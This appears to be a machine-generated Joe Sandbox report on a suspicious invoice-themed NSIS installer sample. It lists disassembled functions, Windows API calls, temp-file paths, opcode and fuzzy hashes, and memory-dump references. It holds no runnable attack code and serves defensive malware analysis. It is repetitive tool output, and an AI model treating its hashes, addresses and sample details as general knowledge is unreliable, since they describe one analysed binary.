                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                                                      • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                                                                                                                      • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                                                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                                                                                                                                      • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                                                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nskD796.tmp$C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll
                                                                                                                                                                                                                      • API String ID: 3109718747-1673095416
                                                                                                                                                                                                                      • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                                                                                                                      • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D2398 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D24DA
                                                                                                                                                                                                                        • Part of subcall function 6F1D122C: lstrcpynW.KERNEL32(00000000,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D123C
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6F1D2460
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F1D247B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4216380887-0
                                                                                                                                                                                                                      • Opcode ID: 8c521e30623eecdd0828b1f15d9b02e2fd3e15e588092252c33632f557e10cb3
                                                                                                                                                                                                                      • Instruction ID: ba9150130f1e509e9dac2437120f44ac10e6283b4e831dd6feb0a118cefa28aa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c521e30623eecdd0828b1f15d9b02e2fd3e15e588092252c33632f557e10cb3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7641F1B1008385EFD710DF38D940A6677B8FB693A0F104A5EF866D7580D731B4A5CB61
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                                                                      • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                                                                                                                      • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F1D21F0,?,00000808), ref: 6F1D1639
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F1D21F0,?,00000808), ref: 6F1D1640
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F1D21F0,?,00000808), ref: 6F1D1654
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F1D21F0,00000000), ref: 6F1D165B
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D1664
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1148316912-0
                                                                                                                                                                                                                      • Opcode ID: 9ee404a2e7c428326a8526d2d7dd7e348f2176388e638688b22375c031ac71a3
                                                                                                                                                                                                                      • Instruction ID: c09a0cffc98cdfbf56492785d3060b253e201178106275c2150dc8fe5cbfe454
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ee404a2e7c428326a8526d2d7dd7e348f2176388e638688b22375c031ac71a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0AC722075387BDA2116A68C4DC9BBEACDF8B2F5B110325F628D219086629D12DBF1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                      • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                                                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                                                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                      • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405E1E
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0), ref: 00405E2E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                      • String ID: 0_B
                                                                                                                                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                                                                                                                                      • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                                                                                                                      • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
